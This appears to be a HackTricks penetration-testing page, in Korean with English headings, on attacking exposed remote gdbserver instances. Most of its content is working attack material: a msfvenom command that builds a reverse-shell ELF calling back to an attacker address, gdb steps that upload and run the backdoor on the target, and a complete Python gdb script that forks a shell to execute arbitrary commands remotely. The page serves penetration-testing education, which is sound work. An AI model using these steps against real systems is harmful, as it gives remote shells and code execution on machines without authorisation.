# Pentesting Remote GdbServer {% hint style="success" %} Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
Support HackTricks * Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! * **Join the** ๐Ÿ’ฌ [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** ๐Ÿฆ [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** * **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
{% endhint %}
**์ทจ์•ฝ์  ํ‰๊ฐ€ ๋ฐ ์นจํˆฌ ํ…Œ์ŠคํŠธ๋ฅผ ์œ„ํ•œ ์ฆ‰์‹œ ์‚ฌ์šฉ ๊ฐ€๋Šฅํ•œ ์„ค์ •**. 20๊ฐœ ์ด์ƒ์˜ ๋„๊ตฌ ๋ฐ ๊ธฐ๋Šฅ์„ ์‚ฌ์šฉํ•˜์—ฌ ์–ด๋””์„œ๋‚˜ ์ „์ฒด ์นจํˆฌ ํ…Œ์ŠคํŠธ๋ฅผ ์‹คํ–‰ํ•  ์ˆ˜ ์žˆ์œผ๋ฉฐ, ์ด๋Š” ํƒ์ƒ‰์—์„œ ๋ณด๊ณ ์— ์ด๋ฅด๊ธฐ๊นŒ์ง€ ๊ฐ€๋Šฅํ•ฉ๋‹ˆ๋‹ค. ์šฐ๋ฆฌ๋Š” ์นจํˆฌ ํ…Œ์Šคํ„ฐ๋ฅผ ๋Œ€์ฒดํ•˜์ง€ ์•Š์œผ๋ฉฐ, ๊ทธ๋“ค์ด ๋” ๊นŠ์ด ํŒŒ๊ณ ๋“ค๊ณ , ์‰˜์„ ํ„ฐ๋œจ๋ฆฌ๊ณ , ์žฌ๋ฏธ๋ฅผ ๋Š๋‚„ ์ˆ˜ ์žˆ๋„๋ก ๋งž์ถคํ˜• ๋„๊ตฌ, ํƒ์ง€ ๋ฐ ์•…์šฉ ๋ชจ๋“ˆ์„ ๊ฐœ๋ฐœํ•ฉ๋‹ˆ๋‹ค. {% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %} ## **๊ธฐ๋ณธ ์ •๋ณด** **gdbserver**๋Š” ํ”„๋กœ๊ทธ๋žจ์„ ์›๊ฒฉ์œผ๋กœ ๋””๋ฒ„๊น…ํ•  ์ˆ˜ ์žˆ๊ฒŒ ํ•ด์ฃผ๋Š” ๋„๊ตฌ์ž…๋‹ˆ๋‹ค. ๋””๋ฒ„๊น…์ด ํ•„์š”ํ•œ ํ”„๋กœ๊ทธ๋žจ๊ณผ ํ•จ๊ป˜ ๋™์ผํ•œ ์‹œ์Šคํ…œ์—์„œ ์‹คํ–‰๋˜๋ฉฐ, ์ด๋ฅผ "๋Œ€์ƒ"์ด๋ผ๊ณ  ํ•ฉ๋‹ˆ๋‹ค. ์ด ์„ค์ •์€ **GNU Debugger**๊ฐ€ ์†Œ์Šค ์ฝ”๋“œ์™€ ๋””๋ฒ„๊น…๋œ ํ”„๋กœ๊ทธ๋žจ์˜ ์ด์ง„ ๋ณต์‚ฌ๋ณธ์ด ์ €์žฅ๋œ ๋‹ค๋ฅธ ๋จธ์‹ ์ธ "ํ˜ธ์ŠคํŠธ"์—์„œ ์—ฐ๊ฒฐํ•  ์ˆ˜ ์žˆ๊ฒŒ ํ•ฉ๋‹ˆ๋‹ค. **gdbserver**์™€ ๋””๋ฒ„๊ฑฐ ๊ฐ„์˜ ์—ฐ๊ฒฐ์€ TCP ๋˜๋Š” ์ง๋ ฌ ๋ผ์ธ์„ ํ†ตํ•ด ์ด๋ฃจ์–ด์งˆ ์ˆ˜ ์žˆ์–ด ๋‹ค์–‘ํ•œ ๋””๋ฒ„๊น… ์„ค์ •์ด ๊ฐ€๋Šฅํ•ฉ๋‹ˆ๋‹ค. **gdbserver๊ฐ€ ๋ชจ๋“  ํฌํŠธ๋ฅผ ์ˆ˜์‹  ๋Œ€๊ธฐํ•˜๋„๋ก ์„ค์ •ํ•  ์ˆ˜ ์žˆ์œผ๋ฉฐ**, ํ˜„์žฌ **nmap์€ ์ด ์„œ๋น„์Šค๋ฅผ ์ธ์‹ํ•  ์ˆ˜ ์—†์Šต๋‹ˆ๋‹ค**. ## Exploitation ### Upload and Execute **msfvenom์œผ๋กœ elf ๋ฐฑ๋„์–ด๋ฅผ ์‰ฝ๊ฒŒ ์ƒ์„ฑํ•˜๊ณ **, ์—…๋กœ๋“œํ•˜์—ฌ ์‹คํ–‰ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค: ```bash # Trick shared by @B1n4rySh4d0w msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4444 PrependFork=true -f elf -o binary.elf chmod +x binary.elf gdb binary.elf # Set remote debuger target target extended-remote 10.10.10.11:1337 # Upload elf file remote put binary.elf binary.elf # Set remote executable file set remote exec-file /home/user/binary.elf # Execute reverse shell executable run # You should get your reverse-shell ``` ### ์ž„์˜์˜ ๋ช…๋ น ์‹คํ–‰ **๋””๋ฒ„๊ฑฐ๊ฐ€ ์ž„์˜์˜ ๋ช…๋ น์„ ์‹คํ–‰ํ•˜๋„๋ก ๋งŒ๋“œ๋Š” ๋˜ ๋‹ค๋ฅธ ๋ฐฉ๋ฒ•์ด ์žˆ์Šต๋‹ˆ๋‹ค** [**์—ฌ๊ธฐ์—์„œ ๊ฐ€์ ธ์˜จ python ์‚ฌ์šฉ์ž ์ •์˜ ์Šคํฌ๋ฆฝํŠธ**](https://stackoverflow.com/questions/26757055/gdbserver-execute-shell-commands-of-the-target). ```bash # Given remote terminal running `gdbserver :2345 ./remote_executable`, we connect to that server. target extended-remote 192.168.1.4:2345 # Load our custom gdb command `rcmd`. source ./remote-cmd.py # Change to a trusty binary and run it to load it set remote exec-file /bin/bash r # Run until a point where libc has been loaded on the remote process, e.g. start of main(). tb main r # Run the remote command, e.g. `ls`. rcmd ls ``` ๋จผ์ € **์ด ์Šคํฌ๋ฆฝํŠธ๋ฅผ ๋กœ์ปฌ์—์„œ ์ƒ์„ฑํ•˜์„ธ์š”**: {% code title="remote-cmd.py" %} ```python #!/usr/bin/env python3 import gdb import re import traceback import uuid class RemoteCmd(gdb.Command): def __init__(self): self.addresses = {} self.tmp_file = f'/tmp/{uuid.uuid4().hex}' gdb.write(f"Using tmp output file: {self.tmp_file}.\n") gdb.execute("set detach-on-fork off") gdb.execute("set follow-fork-mode parent") gdb.execute("set max-value-size unlimited") gdb.execute("set pagination off") gdb.execute("set print elements 0") gdb.execute("set print repeats 0") super(RemoteCmd, self).__init__("rcmd", gdb.COMMAND_USER) def preload(self): for symbol in [ "close", "execl", "fork", "free", "lseek", "malloc", "open", "read", ]: self.load(symbol) def load(self, symbol): if symbol not in self.addresses: address_string = gdb.execute(f"info address {symbol}", to_string=True) match = re.match( f'Symbol "{symbol}" is at ([0-9a-fx]+) .*', address_string, re.IGNORECASE ) if match and len(match.groups()) > 0: self.addresses[symbol] = match.groups()[0] else: raise RuntimeError(f'Could not retrieve address for symbol "{symbol}".') return self.addresses[symbol] def output(self): # From `fcntl-linux.h` O_RDONLY = 0 gdb.execute( f'set $fd = (int){self.load("open")}("{self.tmp_file}", {O_RDONLY})' ) # From `stdio.h` SEEK_SET = 0 SEEK_END = 2 gdb.execute(f'set $len = (int){self.load("lseek")}($fd, 0, {SEEK_END})') gdb.execute(f'call (int){self.load("lseek")}($fd, 0, {SEEK_SET})') if int(gdb.convenience_variable("len")) <= 0: gdb.write("No output was captured.") return gdb.execute(f'set $mem = (void*){self.load("malloc")}($len)') gdb.execute(f'call (int){self.load("read")}($fd, $mem, $len)') gdb.execute('printf "%s\\n", (char*) $mem') gdb.execute(f'call (int){self.load("close")}($fd)') gdb.execute(f'call (int){self.load("free")}($mem)') def invoke(self, arg, from_tty): try: self.preload() is_auto_solib_add = gdb.parameter("auto-solib-add") gdb.execute("set auto-solib-add off") parent_inferior = gdb.selected_inferior() gdb.execute(f'set $child_pid = (int){self.load("fork")}()') child_pid = gdb.convenience_variable("child_pid") child_inferior = list( filter(lambda x: x.pid == child_pid, gdb.inferiors()) )[0] gdb.execute(f"inferior {child_inferior.num}") try: gdb.execute( f'call (int){self.load("execl")}("/bin/sh", "sh", "-c", "exec {arg} >{self.tmp_file} 2>&1", (char*)0)' ) except gdb.error as e: if ( "The program being debugged exited while in a function called from GDB" in str(e) ): pass else: raise e finally: gdb.execute(f"inferior {parent_inferior.num}") gdb.execute(f"remove-inferiors {child_inferior.num}") self.output() except Exception as e: gdb.write("".join(traceback.TracebackException.from_exception(e).format())) raise e finally: gdb.execute(f'set auto-solib-add {"on" if is_auto_solib_add else "off"}') RemoteCmd() ``` {% endcode %}
**์ทจ์•ฝ์  ํ‰๊ฐ€ ๋ฐ ์นจํˆฌ ํ…Œ์ŠคํŠธ๋ฅผ ์œ„ํ•œ ์ฆ‰์‹œ ์‚ฌ์šฉ ๊ฐ€๋Šฅํ•œ ์„ค์ •**. 20๊ฐœ ์ด์ƒ์˜ ๋„๊ตฌ ๋ฐ ๊ธฐ๋Šฅ์„ ์‚ฌ์šฉํ•˜์—ฌ ์–ด๋””์„œ๋‚˜ ์ „์ฒด ์นจํˆฌ ํ…Œ์ŠคํŠธ๋ฅผ ์‹คํ–‰ํ•˜์„ธ์š”. ์šฐ๋ฆฌ๋Š” ์นจํˆฌ ํ…Œ์Šคํ„ฐ๋ฅผ ๋Œ€์ฒดํ•˜์ง€ ์•Š์Šต๋‹ˆ๋‹ค - ๊ทธ๋“ค์ด ๋” ๊นŠ์ด ํŒŒ๊ณ ๋“ค๊ณ , ์‰˜์„ ํ„ฐ๋œจ๋ฆฌ๊ณ , ์žฌ๋ฏธ๋ฅผ ๋Š๋‚„ ์ˆ˜ ์žˆ๋„๋ก ๋งž์ถคํ˜• ๋„๊ตฌ, ํƒ์ง€ ๋ฐ ์•…์šฉ ๋ชจ๋“ˆ์„ ๊ฐœ๋ฐœํ•ฉ๋‹ˆ๋‹ค. {% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %} {% hint style="success" %} AWS ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ GCP ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
HackTricks ์ง€์›ํ•˜๊ธฐ * [**๊ตฌ๋… ๊ณ„ํš**](https://github.com/sponsors/carlospolop) ํ™•์ธํ•˜๊ธฐ! * **๐Ÿ’ฌ [**Discord ๊ทธ๋ฃน**](https://discord.gg/hRep4RUj7f) ๋˜๋Š” [**ํ…”๋ ˆ๊ทธ๋žจ ๊ทธ๋ฃน**](https://t.me/peass)์— ์ฐธ์—ฌํ•˜๊ฑฐ๋‚˜ **Twitter** ๐Ÿฆ [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**๋ฅผ ํŒ”๋กœ์šฐํ•˜์„ธ์š”.** * **[**HackTricks**](https://github.com/carlospolop/hacktricks) ๋ฐ [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) ๊นƒํ—ˆ๋ธŒ ๋ฆฌํฌ์ง€ํ† ๋ฆฌ์— PR์„ ์ œ์ถœํ•˜์—ฌ ํ•ดํ‚น ํŒ์„ ๊ณต์œ ํ•˜์„ธ์š”.**
{% endhint %}